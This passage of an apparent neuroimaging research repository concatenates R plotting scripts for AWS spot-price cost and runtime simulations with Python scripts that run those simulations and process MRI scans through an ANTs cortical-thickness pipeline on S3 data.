geom_point(alpha=0.2)+ theme(legend.position='none')\n var_hist_time <- ggplot(df, aes(x=history_var, y=mean_total_time/3600.0, col=region)) +\n labs(x='Price history variance ($)', y='Mean run time (hrs)', title='C') +\n geom_point(alpha=0.2) + theme(legend.position='none')\n var_hist_cost <- ggplot(df, aes(x=history_var, y=mean_total_cost, col=region)) +\n labs(x='Price history variance ($)', y='Mean total cost ($)', title='D') +\n geom_point(alpha=0.2)+ theme(legend.position='none')\n \n pdf(file=out_file, title='av', width=8, height=180/25.4,\n family='ArialMT', paper='special')\n \n grid.newpage()\n layout=grid.layout(2,2)\n pushViewport(viewport(layout=layout))\n \n print(mean_hist_time, vp=viewport(layout.pos.row=1, layout.pos.col=1))\n print(mean_hist_cost, vp=viewport(layout.pos.row=1, layout.pos.col=2))\n print(var_hist_time, vp=viewport(layout.pos.row=2, layout.pos.col=1))\n print(var_hist_cost, vp=viewport(layout.pos.row=2, layout.pos.col=2))\n \n dev.off()\n}\n\n\n\n# Init variables\n# Local dir of project base on computer\nproj_base_dir <- '~/Documents/projects/Clark2015_AWS'\n# Relative path of project csvs\nrel_csvs_dir <- 'spot-model/csvs'\n\n# Input parameters\n# Pipeline\npipeline <- 'cpac'\n# # Plotting parameters\n# bid_ratio = 2.5\n# num_datasets = 1000\n\n# Define csv\nmerged_csv <- file.path(proj_base_dir, rel_csvs_dir,\n paste(pipeline, '_merged.csv', sep=''))\n\n# Out pdf\nout_pdf <- file.path(proj_base_dir, 'spot-model/plots', paste(pipeline, '_ondemand.pdf', sep=''))\n\n# Load in sim vs stat dataframe\nmerged_df <- read.csv(merged_csv)\nmerged_df$region = ''\nregion_df <- format_region(merged_df)\n\n# Plot\nplot_ondemand(region_df, out_pdf)" }, { "alpha_fraction": 0.5987064242362976, "alphanum_fraction": 0.6087598204612732, "avg_line_length": 36.43157958984375, "blob_id": "3fadcae6afa4b6892ef16df3128d4b033eb66b25", "content_id": "5d398ce19bc7438098fdc5db84ef0c1591872b79", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "R", "length_bytes": 14224, "license_type": "permissive", "max_line_length": 106, "num_lines": 380, "path": "/spot-model/spot_sim_plots_Sw.R", "repo_name": "computational-neuroimaging-lab/Clark2015_AWS", "src_encoding": "UTF-8", "text": "# spot-model/spot_sim_plots.R\n#\n# Author: Cameron Craddock, Daniel Clark (2015)\n\n# Import packages\nlibrary(ggplot2)\nlibrary(gridExtra)\nlibrary(plyr)\nlibrary(reshape2)\n\n# Create aggregated dataframe\naggregate_df <- function(csv, func_name) {\n\n # Read in dataframe\n print('Reading in full dataframe...')\n full_df <- read.csv(csv)\n\n # Check to see if mean or median\n print('Aggregating dataframe...')\n if (func_name == 'mean') {\n df_agg <- ddply(full_df, .(av_zone, bid_ratio, num_datasets), summarize,\n mean_instance_cost=mean(instance_cost),\n mean_num_interr=mean(num_interrupts),\n mean_pernode_cost=mean(per_node_cost),\n mean_run_time=mean(run_time),\n mean_total_cost=mean(total_cost),\n mean_total_time=mean(total_time),\n mean_wait_time=mean(wait_time))\n } else if (func_name == 'median') {\n df_agg <- ddply(full_df, .(av_zone, bid_ratio, num_datasets), summarize,\n median_instance_cost=median(instance_cost),\n median_num_interr=median(num_interrupts),\n median_pernode_cost=median(per_node_cost),\n median_run_time=median(run_time),\n median_total_cost=median(total_cost),\n median_total_time=median(total_time),\n median_wait_time=median(wait_time))\n }\n\n # Rename regions\n df_agg <- format_region(df_agg)\n\n # Return the aggregated dataframe\n return(df_agg)\n}\n\n\n# Populate regions with name formatted\nformat_region <- function(data_frame) {\n data_frame$region[grep('us-west-1',data_frame$av_zone)]='N. California'\n data_frame$region[grep('us-west-2',data_frame$av_zone)]='Oregon'\n data_frame$region[grep('us-east-1',data_frame$av_zone)]='N. Virginia'\n data_frame$region[grep('eu-west-1',data_frame$av_zone)]='Ireland'\n data_frame$region[grep('eu-central-1',data_frame$av_zone)]='Frankfurt'\n data_frame$region[grep('ap-southeast-1',data_frame$av_zone)]='Singapore'\n data_frame$region[grep('ap-southeast-2',data_frame$av_zone)]='Sydney'\n data_frame$region[grep('ap-northeast-1',data_frame$av_zone)]='Tokyo'\n data_frame$region[grep('sa-east-1',data_frame$av_zone)]='Sao Paulo'\n #data_frame$region=factor(data_frame$region)\n\n # Return the data frame with region header\n return(data_frame)\n}\n\n\n# Format cost/time vs num_ds/bid_ratio plots\nformat_cost_times <- function(plot_obj) {\n\n # Add ggplot2 formatting to plot object\n frmt_plot <- plot_obj +\n geom_line() +\n facet_grid(region~., scales='free_y') +\n theme_bw() +\n theme(legend.position='None',\n axis.title.x=element_text(size=10, colour='black', vjust=-.8),\n axis.title.y=element_text(size=10, colour='black'),\n axis.text.x=element_text(size=8, colour='black', angle=35),\n axis.text.y=element_text(size=8, colour='black'),\n strip.text.y=element_text(size=8, colour='black'))\n\n # Return formatted plot\n return(frmt_plot)\n}\n\n\n# Plot and print simulation results to pdf\nplot_cost_times <- function(agg_df, num_ds, bid_rat, out_file) {\n ## Ceiling costs to round to the nearest dollar\n fixed_ds_df <- subset(agg_df, num_datasets==num_ds)\n # Cost vs. Bid ratio\n cost_br <- ggplot(fixed_ds_df,\n aes(x=bid_ratio, y=ceiling(mean_total_cost), col=av_zone)) +\n labs(x='Bid ratio', y='Cost ($)',\n title=paste('Cost vs bid ratio, datasets = ', num_ds))\n cost_br <- cost_br + geom_hline(aes(yintercept=on_demand_total_cost))\n cost_br <- format_cost_times(cost_br)\n\n # Cost vs. Num datasets\n cost_ds <- ggplot(subset(agg_df, bid_ratio==bid_rat),\n aes(x=num_datasets, y=ceiling(mean_total_cost), col=av_zone)) +\n labs(x='Number of datasets', y='Cost ($)',\n title=paste('Cost vs datasets, bid ratio = ', bid_rat))\n cost_ds <- format_cost_times(cost_ds)\n\n # Cost vs. Bid ratio\n time_br <- ggplot(subset(agg_df, num_datasets==num_ds),\n aes(x=bid_ratio, y=mean_total_time/3600, col=av_zone)) +\n labs(x='Bid ratio', y='Time (hours)',\n title=paste('Time vs bid ratio, datasets = ', num_ds))\n time_br <- time_br + geom_hline(aes(yintercept=static_total_time/3600.0))\n time_br <- format_cost_times(time_br)\n\n # Cost vs. Num datasets\n time_ds <- ggplot(subset(agg_df, bid_ratio==bid_rat),\n aes(x=num_datasets, y=mean_total_time/3600, col=av_zone)) +\n labs(x='Number of datasets', y='Time (hours)',\n title=paste('Time vs datasets, bid ratio = ', bid_rat))\n time_ds <- format_cost_times(time_ds)\n\n # Open pdf file to save plots to\n pdf(file=out_file, title='sim_results', width=180/25.4, height=8,\n family='ArialMT', paper='special')\n\n # Set up the 2x2 grid\n grid.newpage()\n layout=grid.layout(1,2)\n pushViewport(viewport(layout=layout))\n\n # Print to pdf\n print(cost_br, vp=viewport(layout.pos.row=1, layout.pos.col=1))\n #print(cost_ds, vp=viewport(layout.pos.row=2, layout.pos.col=1))\n print(time_br, vp=viewport(layout.pos.row=1, layout.pos.col=2))\n #print(time_ds, vp=viewport(layout.pos.row=2, layout.pos.col=2))\n\n # Shutdown printout device\n dev.off()\n}\n\n# Plot and print simulation results to pdf\nplot_tradeoffs <- function(agg_df, num_ds, bid_rat, out_file) {\n ## Ceiling costs to round to the nearest dollar\n fixed_ds_df <- subset(agg_df, num_datasets==num_ds)\n\n # Cost vs. Bid ratio\n time_to <- ggplot(fixed_ds_df,\n aes(x=bid_ratio, y=time_to_cost, col=av_zone)) +\n labs(x='Bid ratio', y='Cost ($)',\n title=paste('Time/cost vs bid ratio, datasets = ', num_ds))\n time_to <- time_to + geom_hline(aes(yintercept=time_to_cost_od))\n time_to <- format_cost_times(time_to)\n \n # Cost vs. Bid ratio\n time_pl <- ggplot(fixed_ds_df,\n aes(x=bid_ratio, y=time_plus_cost, col=av_zone)) +\n labs(x='Bid ratio', y='Cost ($)',\n title=paste('Time/cost vs bid ratio, datasets = ', num_ds))\n time_pl <- time_pl + geom_hline(aes(yintercept=time_plus_cost_od))\n time_pl <- format_cost_times(time_pl)\n\n # Open pdf file to save plots to\n pdf(file=out_file, title='sim_results', width=180/25.4, height=8,\n family='ArialMT', paper='special')\n \n # Set up the 2x2 grid\n grid.newpage()\n layout=grid.layout(1,2)\n pushViewport(viewport(layout=layout))\n \n # Print to pdf\n print(time_to, vp=viewport(layout.pos.row=1, layout.pos.col=1))\n #print(cost_ds, vp=viewport(layout.pos.row=2, layout.pos.col=1))\n print(time_pl, vp=viewport(layout.pos.row=1, layout.pos.col=2))\n #print(time_ds, vp=viewport(layout.pos.row=2, layout.pos.col=2))\n \n # Shutdown printout device\n dev.off()\n}\n\n\n# Plot correlation plots for costs and times\nplot_correlations <- function(sim_stat_df, bid_ratio, pipeline) {\n # Plot\n # Average sim vs static costs\n sim_vs_stat_cost <- ggplot(subset(sim_stat_df, bid_ratio=bid_ratio), \n aes(x=static_total_cost, y=mean_total_cost,\n color=factor(region), size=factor(num_datasets))) +\n labs(x='Static model total cost ($)',\n y='Mean simulation total cost ($)',\n title=paste('Mean simulation costs vs Static model costs, bid ratio =',\n bid_ratio)) +\n geom_point(alpha=2/10)\n # Write out to pdf\n pdf(file=file.path(proj_base_dir, 'spot-model/plots',\n paste(pipeline, '_mean_sim_vs_static_costs.pdf', sep='')),\n width=11, height=8)\n print(sim_vs_stat_cost)\n dev.off()\n\n # Average sim vs static times\n sim_vs_stat_time <- ggplot(subset(sim_stat_df, bid_ratio=bid_ratio),\n aes(x=static_total_time/3600,y=mean_total_time/3600,\n color=factor(region), size=factor(num_datasets))) +\n labs(x='Static model total time (hrs)',\n y='Mean simulation total time (hrs)',\n title=paste('Mean simulation time vs Static model time, bid ratio =',\n bid_ratio)) +\n geom_point(alpha=2/10)\n # Write out to pdf\n pdf(file=file.path(proj_base_dir, 'spot-model/plots',\n paste(pipeline, '_mean_sim_vs_static_times.pdf', sep='')),\n width=11, height=8)\n print(sim_vs_stat_time)\n dev.off()\n}\n\n\n# Plot correlation plots for costs\nplot_cost_ratio <- function(sim_stat_df, pipeline, bid_ratio, num_datasets, itr, x_axis) {\n\n # Ratio vs bid ratio\n if (x_axis == 'bid_ratio') {\n # Get only dataframe at fixed number of datasets\n subset_df <- subset(sim_stat_df, num_datasets=num_datasets)\n\n # Average sim vs static costs\n cost_ratio_plot <- ggplot(subset_df, aes(x=bid_ratio, y=cost_ratio,\n color=factor(region))) +\n labs(x='Bid ratio',\n y='Static cost to mean simulation cost ratio',\n title=paste(pipeline, ' - cost ratio vs number of datasets, num datasets =',\n num_datasets)) +\n geom_point(alpha=2/10)\n\n }\n\n # Ratio vs num datasets\n else if (x_axis == 'num_datasets') {\n # Get only dataframe at fixed bid ratio\n subset_df <- subset(sim_stat_df, bid_ratio=bid_ratio)\n\n # Average sim vs static costs\n cost_ratio_plot <- ggplot(subset_df, aes(x=num_datasets, y=cost_ratio,\n color=factor(region))) +\n labs(x='Number of datasets',\n y='Static cost to mean simulation cost ratio',\n title=paste(pipeline, ' - cost ratio vs number of datasets, bid ratio =',\n bid_ratio, sep='')) +\n geom_point(alpha=2/10)\n\n }\n return(cost_ratio_plot)\n\n}\n\n# Plot correlation plots for costs\nplot_time_ratio <- function(sim_stat_df, pipeline, bid_ratio, num_datasets, itr, x_axis) {\n\n # Ratio vs bid ratio\n if (x_axis == 'bid_ratio') {\n # Get only dataframe at fixed number of datasets\n subset_df <- subset(sim_stat_df, num_datasets=num_datasets)\n\n # Average sim vs static costs\n time_ratio_plot <- ggplot(subset_df, aes(x=bid_ratio, y=time_ratio,\n color=factor(region))) +\n labs(x='Bid ratio',\n y='Static runtime to mean simulation runtime ratio',\n title=paste(pipeline, ' - time ratio vs number of datasets, num datasets =',\n num_datasets)) +\n geom_point(alpha=2/10)\n }\n\n # Ratio vs num datasets\n else if (x_axis == 'num_datasets') {\n # Get only dataframe at fixed bid ratio\n subset_df <- subset(sim_stat_df, bid_ratio=bid_ratio)\n\n # Average sim vs static costs\n time_ratio_plot <- ggplot(subset_df, aes(x=num_datasets, y=time_ratio,\n color=factor(region))) +\n labs(x='Number of datasets',\n y='Static runtime to mean simulation runtime ratio',\n title=paste(pipeline, ' - time ratio vs number of datasets, bid ratio =',\n bid_ratio)) +\n geom_point(alpha=2/10)\n }\n\n return(time_ratio_plot)\n}\n\n\n# Init variables\n# Local dir of project base on computer\nproj_base_dir <- '~/Documents/projects/Clark2015_AWS'\n# Relative path of project csvs\nrel_csvs_dir <- 'spot-model/csvs'\n\n# Input parameters\n# Pipeline\npipeline <- 'ants'\n# Plotting parameters\nbid_ratio = 2.5\nnum_datasets = 1000\n\n# Define csv\nsim_stat_csv <- file.path(proj_base_dir, rel_csvs_dir,\n paste(pipeline, '_merged.csv', sep=''))\n\n# Load in sim vs stat dataframe\nsim_stat_df <- read.csv(sim_stat_csv)\n\nsim_stat_df$region = ''\nregion_df <- format_region(sim_stat_df)\n\n# To write out plots\nplot_cost_times(region_df, num_datasets, bid_ratio,\n file.path(proj_base_dir, 'spot-model/plots',\n paste(pipeline,'_sim_mean.pdf', sep='')))\n\n# Plot the correlations between simultions and static models\nplot_correlations(region_df, bid_ratio, pipeline)\n\n# Iterate over pipelines for plots\npipelines <- c('ants', 'cpac', 'fs')\nfor (p_idx in 1:3) {\n # Init pipeline\n pipeline <- pipelines[p_idx]\n\n # Define csv\n sim_stat_csv <- file.path(proj_base_dir, rel_csvs_dir,\n paste(pipeline, '_avg_sims_and_static.csv', sep=''))\n # Load in sim vs stat dataframe\n sim_stat_df <- read.csv(sim_stat_csv)\n\n # Make plots\n # Plot cost and times vs bid ratio and num datasets\n plot_cost_times(ants_df, num_datasets, bid_ratio,\n file.path(proj_base_dir, 'spot-model/plots',\n paste(pipeline,'_sim_mean.pdf', sep='')))\n\n # Plot the correlations between simultions and static models\n plot_correlations(sim_stat_df, bid_ratio, pipeline)\n\n # Plot ratios vs bid ratios\n cost_plot_br <- plot_cost_ratio(sim_stat_df, pipeline, bid_ratio, num_datasets, p_idx, 'bid_ratio')\n time_plot_br <- plot_time_ratio(sim_stat_df, pipeline, bid_ratio, num_datasets, p_idx, 'bid_ratio')\n if (p_idx == 1) {\n # Open pdf file to save plots to\n pdf(file=paste('~/bid_ratio.pdf'), width=24, height=8)\n # Set up the 2x3 grid\n grid.newpage()\n layout=grid.layout(2,3)\n pushViewport(viewport(layout=layout))\n }\n # Print to pdf\n print(cost_plot_br, vp=viewport(layout.pos.row=1, layout.pos.col=p_idx))\n print(time_plot_br, vp=viewport(layout.pos.row=2, layout.pos.col=p_idx))\n # Write out to pdf\n if (p_idx == 3) {\n dev.off()\n }\n\n# # Plot ratios vs num datasets\n# cost_plot_ds <- plot_cost_ratio(sim_stat_df, pipeline, bid_ratio, num_datasets, p_idx, 'num_datasets')\n# time_plot_ds <- plot_time_ratio(sim_stat_df, pipeline, bid_ratio, num_datasets, p_idx, 'num_datasets')\n# # Open pdf file to save plots to\n# if (p_idx == 1) {\n# pdf(file=paste('~/num_datasets.pdf'), width=24, height=8)\n# # Set up the 2x3 grid\n# grid.newpage()\n# layout=grid.layout(2,3)\n# pushViewport(viewport(layout=layout))\n# }\n# # Print to pdf\n# print(cost_plot_ds, vp=viewport(layout.pos.row=1, layout.pos.col=p_idx))\n# print(time_plot_ds, vp=viewport(layout.pos.row=2, layout.pos.col=p_idx))\n# if (p_idx == 3) {\n# dev.off()\n# }\n}\n" }, { "alpha_fraction": 0.5513840317726135, "alphanum_fraction": 0.5539293885231018, "avg_line_length": 30.118812561035156, "blob_id": "e4cfbf205fdf532120e4c57d1ad8b736cde709db", "content_id": "41315c2a680dd44cd92201634dd92f95e92dfb5c", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3143, "license_type": "permissive", "max_line_length": 80, "num_lines": 101, "path": "/spot-model/run_spot_sims.py", "repo_name": "computational-neuroimaging-lab/Clark2015_AWS", "src_encoding": "UTF-8", "text": "# run_spot_sims.py\n#\n# Author: Daniel Clark\n\n'''\nScript to run AWS simulation for a given configuration file in parallel\n\nUsage:\n python run_spot_sims.py -c <config_file> -n <num_cores>\n -o <out_dir> -s <spot_csv>\n'''\n\n# Build processing list\ndef build_proc_list(config_file, out_dir, spot_csv):\n '''\n Build a list of spot_price_model.main processes\n\n Parameters\n ----------\n config_file : string\n filepath to the spot model configuration file\n out_dir : string\n directory to output the results of the simulations\n spot_csv : string\n filepath to the spot history csv file\n\n Returns\n -------\n proc_list : list\n list of multiprocessing.Process objects that run the simulation\n '''\n\n # Import packages\n import utils\n import yaml\n from multiprocessing import Process\n\n # Import local modules\n import record_spot_price\n import spot_price_model\n\n # Init variables\n proc_list = []\n config_dict = yaml.load(open(config_file, 'r'))\n\n # Build processing list\n for avz in config_dict['av_zone']:\n for br in config_dict['bid_ratio']:\n for nj in config_dict['num_jobs']:\n proc = Process(target=spot_price_model.main,\n args=(out_dir, config_dict['proc_time'], nj,\n config_dict['jobs_per'],\n config_dict['in_gb'],\n config_dict['out_gb'],\n config_dict['out_gb_dl'],\n config_dict['up_rate'],\n config_dict['down_rate'], br,\n config_dict['instance_type'], avz,\n config_dict['product'], spot_csv, None))\n proc_list.append(proc)\n\n # Return process list\n return proc_list\n\n\n# Make module executable\nif __name__ == '__main__':\n\n # Import packages\n import argparse\n\n # Import local modules\n import utils\n\n # Init argparser\n parser = argparse.ArgumentParser(description=__doc__)\n\n # Required arguments\n parser.add_argument('-c', '--config_file', nargs=1, required=True,\n type=str, help='Path to AWS sim configuration file')\n parser.add_argument('-n', '--num_cores', nargs=1, required=True,\n type=int, help='Number of cores to run at once')\n parser.add_argument('-o', '--out_dir', nargs=1, required=True,\n type=str, help='Output base directory to store results')\n parser.add_argument('-s', '--spot_csv', nargs=1, required=True,\n type=str, help='Path to spot history csv')\n\n # Parse arguments\n args = parser.parse_args()\n\n # Init variables\n config_file = args.config_file[0]\n num_cores = args.num_cores[0]\n out_dir = args.out_dir[0]\n spot_csv = args.spot_csv[0]\n\n # Build processing list\n proc_list = build_proc_list(config_file, out_dir, spot_csv)\n\n # Run jobs in parallel\n utils.run_in_parallel(proc_list, num_cores)\n" }, { "alpha_fraction": 0.6262981295585632, "alphanum_fraction": 0.6331658363342285, "avg_line_length": 31.2702693939209, "blob_id": "b7cdbb28fdc8ea472b17f47adc1933e3de2b44a8", "content_id": "6deedab5c251a8328a5cfc6e102257bec32d7345", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11940, "license_type": "permissive", "max_line_length": 107, "num_lines": 370, "path": "/data-preproc/scripts/act_run.py", "repo_name": "computational-neuroimaging-lab/Clark2015_AWS", "src_encoding": "UTF-8", "text": "# act_run.py\n#\n# Author: Daniel Clark, 2015\n\n'''\nThis module contains functions which run antsCorticalThickness and ROI\nextractions and then uploads them to S3\n'''\n\n# Create the ACT nipype workflow\ndef create_workflow(wf_base_dir, input_anat, oasis_path):\n '''\n Method to create the nipype workflow that is executed for\n preprocessing the data\n\n Parameters\n ----------\n wf_base_dir : string\n filepath to the base directory to run the workflow\n input_anat : string\n filepath to the input file to run antsCorticalThickness.sh on\n oasis_path : string\n filepath to the oasis\n\n Returns\n -------\n wf : nipype.pipeline.engine.Workflow instance\n the workflow to be ran for preprocessing\n '''\n\n # Import packages\n from act_interface import antsCorticalThickness\n import nipype.interfaces.io as nio\n import nipype.pipeline.engine as pe\n import nipype.interfaces.utility as util\n from nipype.interfaces.utility import Function\n from nipype import logging as np_logging\n from nipype import config\n import os\n\n # Init variables\n oasis_trt_20 = os.path.join(oasis_path,\n 'OASIS-TRT-20_jointfusion_DKT31_CMA_labels_in_OASIS-30.nii')\n\n # Setup nipype workflow\n if not os.path.exists(wf_base_dir):\n os.makedirs(wf_base_dir)\n wf = pe.Workflow(name='thickness_workflow')\n wf.base_dir = wf_base_dir\n\n # Init log directory\n log_dir = wf_base_dir\n\n # Define antsCorticalThickness node\n thickness = pe.Node(antsCorticalThickness(), name='thickness')\n\n # Set antsCorticalThickness inputs\n thickness.inputs.dimension = 3\n thickness.inputs.segmentation_iterations = 1\n thickness.inputs.segmentation_weight = 0.25\n thickness.inputs.input_skull = input_anat #-a\n thickness.inputs.template = oasis_path + 'T_template0.nii.gz' #-e\n thickness.inputs.brain_prob_mask = oasis_path + \\\n 'T_template0_BrainCerebellumProbabilityMask.nii.gz' #-m\n thickness.inputs.brain_seg_priors = oasis_path + \\\n 'Priors2/priors%d.nii.gz' #-p\n thickness.inputs.intensity_template = oasis_path + \\\n 'T_template0_BrainCerebellum.nii.gz' #-t\n thickness.inputs.extraction_registration_mask = oasis_path + \\\n 'T_template0_BrainCerebellumExtractionMask.nii.gz' #-f\n thickness.inputs.out_prefix = 'OUTPUT_' #-o\n thickness.inputs.keep_intermediate_files = 0 #-k\n\n # Node to run ANTs 3dROIStats\n ROIstats = pe.Node(util.Function(input_names=['mask','thickness_normd'], \n output_names=['roi_stats_file'], \n function=roi_func),\n name='ROIstats')\n wf.connect(thickness, 'cortical_thickness_normalized', \n ROIstats, 'thickness_normd')\n ROIstats.inputs.mask = oasis_trt_20\n\n # Create datasink node\n datasink = pe.Node(nio.DataSink(), name='sinker')\n datasink.inputs.base_directory = wf_base_dir\n\n # Connect thickness outputs to datasink\n wf.connect(thickness, 'brain_extraction_mask', \n datasink, 'output.@brain_extr_mask')\n wf.connect(thickness, 'brain_segmentation', \n datasink, 'output.@brain_seg')\n wf.connect(thickness, 'brain_segmentation_N4', \n datasink, 'output.@brain_seg_N4')\n wf.connect(thickness, 'brain_segmentation_posteriors_1', \n datasink, 'output.@brain_seg_post_1')\n wf.connect(thickness, 'brain_segmentation_posteriors_2', \n datasink, 'output.@brain_seg_post_2')\n wf.connect(thickness, 'brain_segmentation_posteriors_3', \n datasink, 'output.@brain_seg_post_3')\n wf.connect(thickness, 'brain_segmentation_posteriors_4', \n datasink, 'output.@brain_seg_post_4')\n wf.connect(thickness, 'brain_segmentation_posteriors_5', \n datasink, 'output.@brain_seg_post_5')\n wf.connect(thickness, 'brain_segmentation_posteriors_6', \n datasink, 'output.@brain_seg_post_6')\n wf.connect(thickness, 'cortical_thickness', \n datasink, 'output.@cortical_thickness')\n wf.connect(thickness, 'cortical_thickness_normalized', \n datasink,'output.@cortical_thickness_normalized')\n # Connect ROI stats output text file to datasink\n wf.connect(ROIstats, 'roi_stats_file', datasink, 'output.@ROIstats')\n\n # Setup crashfile directory and logging\n wf.config['execution'] = {'hash_method': 'timestamp', \n 'crashdump_dir': '/home/ubuntu/crashes'}\n config.update_config({'logging': {'log_directory': log_dir, \n 'log_to_file': True}})\n np_logging.update_logging(config)\n\n # Return the workflow\n return wf\n\n\n# Mean ROI stats function\ndef roi_func(mask, thickness_normd):\n '''\n Method to run 3dROIstats on an input image, thickness_normd, using\n a mask, mask The output is written to the current working directory\n as 'ROIstats.txt'\n\n Parameters\n ----------\n mask : string\n filepath to the mask to be used\n thickness_normd : string\n filepath to the input image\n\n Returns\n -------\n roi_stats_file : string\n the filepath to the generated ROIstats.txt file\n '''\n\n # Import packages\n import os\n\n # Set command and execute\n cmd = '3dROIstats -mask ' + mask + ' ' + thickness_normd + ' > ' + os.getcwd() + '/ROIstats.txt'\n os.system(cmd)\n\n # Get the output\n roi_stats_file = os.path.join(os.getcwd(), 'ROIstats.txt')\n\n # Return the filepath to the output\n return roi_stats_file\n\n\n# Setup log file\ndef setup_logger(logger_name, log_file, level, to_screen=False):\n '''\n Function to initialize and configure a logger that can write to file\n and (optionally) the screen.\n\n Parameters\n ----------\n logger_name : string\n name of the logger\n log_file : string\n file path to the log file on disk\n level : integer\n indicates the level at which the logger should log; this is\n controlled by integers that come with the python logging\n package. (e.g. logging.INFO=20, logging.DEBUG=10)\n to_screen : boolean (optional)\n flag to indicate whether to enable logging to the screen\n\n Returns\n -------\n logger : logging.Logger object\n Python logging.Logger object which is capable of logging run-\n time information about the program to file and/or screen\n '''\n\n # Import packages\n import logging\n\n # Init logger, formatter, filehandler, streamhandler\n logger = logging.getLogger(logger_name)\n logger.setLevel(level)\n formatter = logging.Formatter('%(asctime)s : %(message)s')\n\n # Write logs to file\n file_handler = logging.FileHandler(log_file)\n file_handler.setFormatter(formatter)\n logger.addHandler(file_handler)\n\n # Write to screen, if desired\n if to_screen:\n stream_handler = logging.StreamHandler()\n stream_handler.setFormatter(formatter)\n logger.addHandler(stream_handler)\n\n # Return the logger\n return logger\n\n\n# Form list of anatomical s3 keys\ndef return_anat_dict(bucket, prefix):\n '''\n Function to create and return an dictionary from an S3 bucket\n prefix, where the key is the subject unique id and the value is the\n S3 key filepath\n\n Parameters\n ----------\n bucket : boto.s3.bucket.Bucket instance\n an instance of the boto S3 bucket class to download from\n prefix : string\n S3 bucket prefix to parse for anatomical data in\n\n Returns\n -------\n key_dict : dictionary\n dictionary of unique subject id's as keys and S3 key filepaths\n as values\n '''\n\n # Init variables\n key_list = []\n key_dict = {}\n\n # Check prefix\n if not prefix.endswith('/'):\n prefix = prefix + '/'\n\n # Gather all anatomical files\n for key in bucket.list(prefix=prefix):\n key_name = str(key.name)\n if 'anat' in key_name:\n key_list.append(key_name)\n print 'Adding %s to list...' % key_name\n\n # Create subject dictionary\n for key_idx, key_name in enumerate(key_list):\n\n # Grab unique subj/session as id\n key_suffix = key_name.replace(prefix, '')\n subj_id = '-'.join(key_suffix.split('/')[:2])\n\n # Add key, val to dictionary\n key_dict[subj_id] = key_name\n\n # Return dictionary\n return key_dict\n\n\n# Main routine\ndef main(index, local_dir):\n '''\n Function to download an anatomical dataset from S3 and process it\n through ANTS antsCorticalThickness.sh script, then upload the data back\n to S3\n\n Parameters\n ----------\n index : integer\n the index of the subject to process\n local_dir : string\n filepath to the local directory to store the input and\n processed outputs\n '''\n\n # Import packages\n import boto\n import logging\n import os\n import subprocess\n import time\n from CPAC.AWS import aws_utils, fetch_creds\n\n # Init variables\n creds_path = '/home/ubuntu/secure-creds/aws-keys/fcp-indi-keys2.csv'\n # Oasis template paths\n oasis_path = '/home/ubuntu/OASIS-30_Atropos_template/'\n # Bucket and S3 dataset prefix\n bucket = fetch_creds.return_bucket(creds_path, 'fcp-indi')\n prefix = 'data/Projects/CORR/RawData/IBA_TRT/'\n # Local dirs for working and download\n dl_dir = os.path.join(local_dir, 'inputs')\n\n # Setup logger\n act_log_path = '/home/ubuntu/run_act_%d.log' % index\n act_log = setup_logger('act_log', act_log_path, logging.INFO, to_screen=True)\n\n # Make input and workdirs\n if not os.path.exists(dl_dir):\n os.makedirs(dl_dir)\n\n # Get S3 anatomical paths dictionary\n anat_dict = return_anat_dict(bucket, prefix)\n\n # Get lis of unique subject ids to download\n key_list = sorted(anat_dict.keys())\n\n # Extract subject of interest\n subj_id = key_list[index]\n s3_path = anat_dict[subj_id]\n\n # Init working dir\n working_dir = os.path.join(local_dir, '%s_act_workdir' % subj_id)\n if not os.path.exists(working_dir):\n os.makedirs(working_dir)\n\n # Download data\n act_log.info('Downloading %s...' % s3_path)\n s3_key = bucket.get_key(s3_path)\n s3_filename = os.path.basename(s3_path)\n dl_filename = os.path.join(dl_dir, subj_id, s3_filename)\n\n # Make folders if need be\n dl_dirs = os.path.dirname(dl_filename)\n if not os.path.exists(dl_dirs):\n os.makedirs(dl_dirs)\n s3_key.get_contents_to_filename(dl_filename)\n\n # Create the nipype workflow\n act_wf = create_workflow(working_dir, dl_filename, oasis_path)\n\n # Run the workflow\n act_log.info('Running the workflow...')\n # Start timing\n start = time.time()\n act_wf.run()\n # Finish timing\n fin = time.time()\n act_log.info('Completed workflow!')\n\n # Log finish and total computation time\n elapsed = (fin - start)/60.0\n act_log.info('Total time running is: %f minutes' % elapsed)\n\n # Gather processed data\n act_log.info('Gathering outputs for upload to S3...')\n upl_list = []\n for root, dirs, files in os.walk(working_dir):\n if files:\n upl_list.extend([os.path.join(root, fl) for fl in files])\n # Update log with upload info\n act_log.info('Gathered %d files for upload to S3' % len(upl_list))\n\n # Build upload list\n upl_prefix = os.path.join(prefix.replace('RawData', 'Outputs'),\n 'ants', subj_id)\n s3_upl_list = [upl.replace(working_dir, upl_prefix) for upl in upl_list]\n\n # Upload to S3\n aws_utils.s3_upload(bucket, upl_list, s3_upl_list)\n\n\n# Run main by default\nif __name__ == '__main__':\n\n # Import packages\n import sys\n\n # Init variables\n index = int(sys.argv[1])-1\n local_dir = sys.argv[2]\n\n main(index, local_dir)\n" }, { "alpha_fraction": 0.734649121761322, "alphanum_fraction": 0.7521929740905762, "avg_line_length": 64.14286041259766, "blob_id": "6742dd0952680d2b0367b02d3932f5a43a10e7ed", "content_id": "83661d1a59f9f137370dfdc4b21cacce3f58f315", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 4560, "license_type": "permissive", "max_line_length": 205, "num_lines": 70, "path": "/README.md", "repo_name": "computational-neuroimaging-lab/Clark2015_AWS", "src_encoding": "UTF-8", "text": "# Clark2015_AWS\nAnalyzing neuroimaging data in the AWS cloud\n\nContents\n========\n\ndata-preproc\n------------\n- aws_pipelines.xlsx - Spreadsheet showing the pipeline runtime parameters on AWS for CPAC, Freesurfer (w/ and w/o GPU), ANTs, and QAP\n\n results\n -------\n - act_runtimes.png - histogram of the runtimes for completing ANTs cortical thickness on IBA_TRT subjects\n - act_runtimes.yml - YAML containing the runtimes in hours\n - adhd200_cpac_benchmark.results - summary of the runtime results for the CPAC run on subjects from the ADHD200 dataset\n - adhd200_cpac_runtimes.png - histogram of the runtime to complete running CPAC on subjects from the ADHD200 dataset\n - adhd200_cpac_runtimes.yml - YAML containing the runtimes in minutes\n - adhd200_fail_logs.yml - YAML containing s3 paths to the log files from the ADHD200 CPAC run\n - adhd200_outdirs_mb.png - historgram of the output directory sizes of the 